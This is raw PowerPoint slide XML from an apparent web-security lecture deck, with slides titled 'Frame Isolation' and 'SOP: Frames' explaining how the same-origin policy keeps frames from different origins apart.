        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B1ACA8A-7FE9-F046-8CC4-69B0E0DF15DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000750" y="2613025"/>
            <a:ext cx="3514725" cy="360363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A2FF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="160121" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="305936">
              <a:spcBef>
                <a:spcPts val="1261"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1301" b="1" spc="23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.example.com/index.html</a:t>
            </a:r>
            <a:endParaRPr sz="1301">
              <a:latin typeface="Arial"/>
              <a:cs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5C7EBEC-1637-504F-B65D-9B62A8FA1038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932113" y="1244600"/>
            <a:ext cx="4192587" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-558" dirty="0"/>
              <a:t>Frame</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-228" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-410" dirty="0"/>
              <a:t>Isolation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147459" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1C8A3D-D62F-8742-98FE-829033287463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="2784475"/>
            <a:ext cx="6951663"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672" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350">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ts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Each frame in a window has its own origin (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>proto://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" u="sng" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>host:port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1588"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frame can only access data with the same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="167000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Make HTTP requests, read/write DOM, access local storage  Frame cannot access data associated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2350"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with a diﬀerent origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2350"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1688"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parent window cannot access data within a  child frame (if it has a diﬀerent origin)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147460" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2645D0E3-670D-534A-AE79-18410AA7D6F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="5410200"/>
            <a:ext cx="2563813" cy="16287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2B8172C-4731-E345-A122-4969B3D50004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3335338" y="1244600"/>
            <a:ext cx="3390900" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-815" dirty="0"/>
              <a:t>SOP:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-440" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-563" dirty="0"/>
              <a:t>Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148483" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A199671-DDD2-584C-83F3-E8EA045302CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="523875" y="2486025"/>
            <a:ext cx="9010650" cy="4229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
        <p:nvSpPr>
          <p:cNvPr id="148484" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3176B7ED-48F4-5C40-BF7B-5F5EBBF12F58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="839788" y="3097213"/>
            <a:ext cx="3810000" cy="2657475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7617459"/>
              <a:gd name="T1" fmla="*/ 0 h 5309234"/>
              <a:gd name="T2" fmla="*/ 14922 w 7617459"/>
              <a:gd name="T3" fmla="*/ 0 h 5309234"/>
              <a:gd name="T4" fmla="*/ 14922 w 7617459"/>
              <a:gd name="T5" fmla="*/ 10469 h 5309234"/>
              <a:gd name="T6" fmla="*/ 0 w 7617459"/>
              <a:gd name="T7" fmla="*/ 10469 h 5309234"/>
              <a:gd name="T8" fmla="*/ 0 w 7617459"/>
              <a:gd name="T9" fmla="*/ 0 h 53092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17459" h="5309234">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7617114" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7617114" y="5308703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5308703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00A2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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19996BE5-7E9C-BC46-A2D1-2F5836ADC84D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="4068763"/>
            <a:ext cx="3810000" cy="347662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="6354" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="635" algn="ctr">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2226" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2226" b="1" spc="-3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2226" b="1" spc="-83" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr sz="2226">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600CA990-6FE1-FB43-B44E-7D5920702629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="4419600"/>
            <a:ext cx="3810000" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="6354" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2226" b="1" spc="-38" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2226" b="1" spc="-3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2226" b="1" spc="8" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a.domain.com</a:t>
            </a:r>
            <a:endParaRPr sz="2226">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148487" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A3BD73-A417-864D-90EA-EB5D30627595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5408613" y="3097213"/>
            <a:ext cx="3811587" cy="2657475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7617459"/>
              <a:gd name="T1" fmla="*/ 0 h 5309234"/>
              <a:gd name="T2" fmla="*/ 14978 w 7617459"/>
              <a:gd name="T3" fmla="*/ 0 h 5309234"/>
              <a:gd name="T4" fmla="*/ 14978 w 7617459"/>
              <a:gd name="T5" fmla="*/ 10469 h 5309234"/>
              <a:gd name="T6" fmla="*/ 0 w 7617459"/>
              <a:gd name="T7" fmla="*/ 10469 h 5309234"/>
              <a:gd name="T8" fmla="*/ 0 w 7617459"/>
              <a:gd name="T9" fmla="*/ 0 h 53092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17459" h="5309234">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7617108" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7617108" y="5308703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5308703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="61D8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8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5564BC00-5E14-4F42-BAAD-D59FA0054C3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5408613" y="4068763"/>
            <a:ext cx="3811587" cy="347662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="6354" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3812" algn="ctr">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2226" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2226" b="1" spc="-3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2226" b="1" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:endParaRPr sz="2226">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38A5F633-30B0-C149-9CD5-850ABDC0FE6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5408613" y="4419600"/>
            <a:ext cx="3811587" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="6354" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2226" b="1" spc="-38" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2226" b="1" spc="-3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2226" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>b.domain.com</a:t>
            </a:r>
            <a:endParaRPr sz="2226">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148490" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA28A125-5B02-D74E-AD26-C686B955B402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4454525" y="4425950"/>
            <a:ext cx="1149350" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2299970"/>
              <a:gd name="T1" fmla="*/ 102 w 2299970"/>
              <a:gd name="T2" fmla="*/ 4368 w 2299970"/>
              <a:gd name="T3" fmla="*/ 4470 w 2299970"/>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299970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="52354" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2247304" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2299658" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="10470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8491" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D50809F-1C57-8843-88CD-938B9EAD72AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5578475" y="4325938"/>
            <a:ext cx="201613" cy="200025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 402590"/>
              <a:gd name="T1" fmla="*/ 0 h 402590"/>
              <a:gd name="T2" fmla="*/ 0 w 402590"/>
              <a:gd name="T3" fmla="*/ 742 h 402590"/>
              <a:gd name="T4" fmla="*/ 797 w 402590"/>
              <a:gd name="T5" fmla="*/ 371 h 402590"/>
              <a:gd name="T6" fmla="*/ 0 w 402590"/>
              <a:gd name="T7" fmla="*/ 0 h 402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590" h="402590">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="402081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402081" y="2010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48492" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C91FEEA-4DA3-334C-A2DD-57417E18E399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4278313" y="4325938"/>
            <a:ext cx="201612" cy="200025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 797 w 402590"/>
              <a:gd name="T1" fmla="*/ 0 h 402590"/>
              <a:gd name="T2" fmla="*/ 0 w 402590"/>
              <a:gd name="T3" fmla="*/ 371 h 402590"/>
              <a:gd name="T4" fmla="*/ 797 w 402590"/>
              <a:gd name="T5" fmla="*/ 742 h 402590"/>
              <a:gd name="T6" fmla="*/ 797 w 402590"/>
              <a:gd name="T7" fmla="*/ 0 h 402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590" h="402590">
                <a:moveTo>
                  <a:pt x="402081" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="201040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402081" y="402081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4020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48493" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5675CA4D-DFDB-8846-9173-2373A468E30A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4533900" y="3930650"/>
            <a:ext cx="990600" cy="9890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defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>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20945</TotalTime>
  <Words>9761</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>1109</Paragraphs>
  <Slides>133</Slides>
  <Notes>35</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133</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="150" baseType="lpstr">
      <vt:lpstr>MS UI Gothic</vt:lpstr>
      <vt:lpstr>PMingLiU</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Eras Bold ITC</vt:lpstr>
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>Lucida Sans Unicode</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Philosopher</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
